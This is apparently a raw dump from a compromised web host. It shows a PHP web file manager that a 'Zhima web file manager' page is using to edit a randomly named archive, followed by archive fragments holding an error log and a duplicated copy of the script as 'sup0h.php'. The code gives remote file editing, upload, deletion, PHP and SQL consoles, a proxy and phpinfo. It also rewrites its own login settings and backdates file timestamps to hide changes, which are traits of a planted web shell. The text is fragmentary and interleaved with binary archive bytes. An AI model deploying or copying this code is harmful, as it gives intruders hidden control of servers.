芝麻web文件管理V1.00

编辑当前文件:/home/gettoplisting/public_html/dd7e5a-20251107115653/h6snx5/h6snx5.zip
'; } return ' '.$str.'
'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'
'.__('Name').''.__('Value').'
'; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' '.__('File manager').'
'.__('Login').'     '.__('Password').'    
'.fm_lang_form($language).' '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = '
'.fm_home().' Url:
'; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%()%i', '$1'.''.$proxy_form, $result); echo $result; die(); } } ?> <?=__('File manager')?>
'.__('File manager').' - '.__('Settings').' '.(empty($msg)?'':''.$msg.'').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' SQL server SQL user SQL password SQL DB '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' '.__('Reset settings').'
'.__('Settings').' - '.__('Authorization').'
'.__('Login').'
'.__('Password').'
'.__('Cookie').'
'.__('Days').'
'.__('Script').'
'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?>

'.fm_run_input('php'); else echo ''.fm_run_input('sql'); ?>

'."\n"; $select .= '\n"; foreach ($tmpl as $key=>$value){ $select.='\n"; } $select .= "\n"; echo $select; } ?>
'.strtoupper($res_lng).' '.__('Result').'
'.$fun($res).'
'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?>

'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?>
:
'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' '.__('Delete') . ''; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' '.__('Delete').''; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' '.__('Delete').''; } else $msg .= __('Error occurred').': '.__('no files'); } ?>
    ,
     '.$file.''; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '     '.$file.'' : '     '.$file.''; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '' . __('Delete') . ''; $renamelink = fm_root($file) ? '' : '' . __('Rename') . ''; $rightstext = ($file=='.' || $file=='..') ? '' : '' . @fm_rights_string($filename) . ''; ?>
Github | .'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | proxy'; if (!empty($fm_config['show_phpinfo'])) echo ' | phpinfo'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | xls'; if (!empty($fm_config['fm_settings'])) echo ' | '.__('Settings').''; ?>
errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> PK g[ `` eu9d36.zipnu[PKf[Ng\n error_lognu[[27-Oct-2025 03:46:25 UTC] PHP Parse error: syntax error, unexpected ''AXAQsFGthWl+8jKwGyksoSOvgDoI9' (T_ENCAPSED_AND_WHITESPACE) in /home/gettoplisting/public_html/dd7e5a/eu9d36/wbcr8.php on line 4 PKf[Ng\n error_lognu[PKIPK g[ d h6snx5.tarnu[sup0h.php000064400000232747151032666610006341 0ustar00<\/script>\r\n errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = 